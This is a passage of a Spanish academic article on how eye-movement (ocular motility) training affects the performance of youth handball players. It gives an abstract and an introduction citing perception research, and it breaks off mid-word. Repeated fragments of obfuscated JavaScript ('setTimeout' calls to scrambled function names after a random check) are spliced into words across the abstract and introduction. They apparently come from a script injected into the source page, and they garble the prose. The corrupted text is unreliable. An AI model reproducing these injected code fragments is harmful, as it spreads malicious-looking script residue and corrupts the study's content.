EFECTO DE LA MOTILIDAD OCULAR EXTRÍNSECA SOBRE EL RENDIMIENTO Y EL NIVEL DE EFICACIA EN EQUIPOS DE BALONMANO EN ETAPAS DE FORMACIÓN.

Autor: Emiliano Blanco Valero

El incremento del conocimiento entre los investigadores de que la percepción hábil de la imagen, que se visualiza determina un comportamiento apropiado en el deporte ha llevado a investigar la importancia de esta variable en el rendimiento deportivo. El objetivo de este estudio fue analizar el papel de la motilidad ocular extrínseca sobre el nivel de eficacia y rendimiento en cuatro equipos de balonmano en etapas de formación. Se utilizó una metodología de percepción visual (grupo experimental) y una metodología tradicional (grupo control). La muestra estaba formada por 53 jugadores de categoría infantil de 11 y 12 años correspondientes a cuatro equipos que participaban en liga autonómica. Fue realizado un pretest y un postest de ejercicios de control para ambos grupos a través del análisis de situaciones de juego, registrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando estos datos con grabaciones en video. Los datos fueron analizados mediante una escala de estimación numérica y planillas de análisis de los elementos técnico-tácticos individuales defensivos y ofensivos, obteniendo los siguientes resultados: el grupo experimental mejoró su nivel de rendimiento experimentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando una mejora del 28% con respecto al pretest. En la fase defensiva, hubo un mayor número de anticipaciones, cambio de posesión de pelota, interceptaciones y menor porcentaje de error en las anticipaciones. En el grupo control, también se observaron mejoras en su rendimiento, pero de un 5,2% con respecto al pretest.

INTRODUCCIÓN.

El incremento del conocimiento entre los investigadores de la percepción hábil de la imagen que se visualiza determina un comportamiento apropiado en el deporte, ha llevado a investigar la importancia de esta variable en el rendimiento deportivo. Así, son numerosos los trabajos recientes de investigación que sugieren que el rendimiento exitoso en un deporte requiere una destreza perceptiva así como de una ejecución precisa del movimiento (Abernethy 1987; Bakker, Withing y Van der Brug, 1990; Williams, Davids, Burwitz y Williams, 1992).

Desde una perspectiva cognitiva, el aprendizaje y el rendimiento en habilidades deportivas está fuertemente condicionado por la velocidad de cambio de información contextual e la situación deportiva concreta. Por tanto, se parte de que la limitada capacidad de procesamiento de información del deportista en un entorno complejo, en cuanto a cantidad de información estimular se refiere, y la limitación temporal en la que normalmente se encuentran, requiere de las demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andas situacionales queden reducidas únicamente las fuentes de información más pertinentes Parece evidente que el proceso de selección de información relevante, desestimandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando aquellas áreas de información menos relevante, no se conduce de una forma arbitraria sino que se basa en una deliberada estrategia visual de búsqueda. Esta estrategia de búsqueda permite al deportista hábil hacer más eficiente el uso del tiempo disponible para el análisis de la imagen (Bard y Fleury, 1976). Los primeros trabajos en este campo han estudiado la percepción por medio de habilidades no específicas en este campo como la agudeza visual, la sensibilidad al contraste, acomodación y el campo visual (Williams, et al. 1992).

Un jugador que se encuentra dentro de una situación en la que se requiere una habilidad motora abierta, depende en gran medida de su sistema visual, porque en estas situaciones se requiere un nivel adecuado de respuesta al sistema visual, lo que permite la percepción y el procesamiento de estímulos significativos para alcanzar una decisión correcta que se interrelacione (Fernández, 2005).

Estudios recientes defienden que la atención debe dirigirse primero al tipo de información, de manera que un jugador se familiarice progresivamente con la tarea a realizar que le permita anticiparse correctamente al oponente (Bennett, 2002).

Desde una perspectiva comportamental del análisis de la percepción  en el deporte, se argumenta que los trabajos basados en medidas optométricas estandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andarizadas revelan una relación equívoca con la habilidad en el deporte (Abernethy, 1987; Blundell, 1985; Starkes andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Deakin, 1984). Estos autores consideran que estos estudios se limitan a analizar el estado  de funcionamiento del componente estructural del sistema visual, por medio de test indiscretos que miden en términos de magnitud el estado de las habilidades visuales en situaciones descontextualizadas de una situación deportiva concreta. Consecuentemente, aunque es reconocido que este componente puede ser un factor limitante en el rendimiento visual en el deporte, trabajos recientes se han concentrado en el estudio y análisis de variables que permitan a los investigadores a indagar en el componente cognitivo del sistema visual.

Las primeras investigaciones realizadas en esta línea por los investigadores en Aprendizaje y Control Motor demuestran que el deportista hábil posee las mismas formas de conocimiento declarativo (saber qué hacer) y procedimental (saber cómo hacerlo) que los expertos en tareas cognitivas esenciales. Los expertos también han demostrado superiores habilidades en el uso de información visual anticipada, en cuanto a anticipación de la dirección de un móvil en una variedad de deportes diferentes (Abernethy, 1987, para una revisión más profunda ver Williams et al. 1993). Además, los expertos parecen más hábiles en el reconocimiento, recuerdo y clasificación semántica de situaciones estructuradas de juego (Williams, Davids, Burwitz y Williams, 1993). Por otro lado, el extenso conocimiento contextual de los expertos también resulta en una toma de decisiones más rápidas y precisas deduciéndose estrategias desarrolladas por estos deportistas que pueden ser objeto de análisis y entrenamiento.

En este trabajo se van a presentar algunas habilidades visuales investigadas en Aprendizaje y Control Motor así como se expondrá una metodología para el análisis del comportamiento visual del deportista basado en un sistema de seguimiento de los movimientos oculares. Este sistema nos permite conocer los puntos de fijación visual del deportista, los movimientos sacádicos oculares o de seguimiento  móviles. La información que resulta de este protocolo nos permite no sólo obtener la información acerca del tipo de movimiento ocular sino que además permite inferir la naturaleza de la observación identific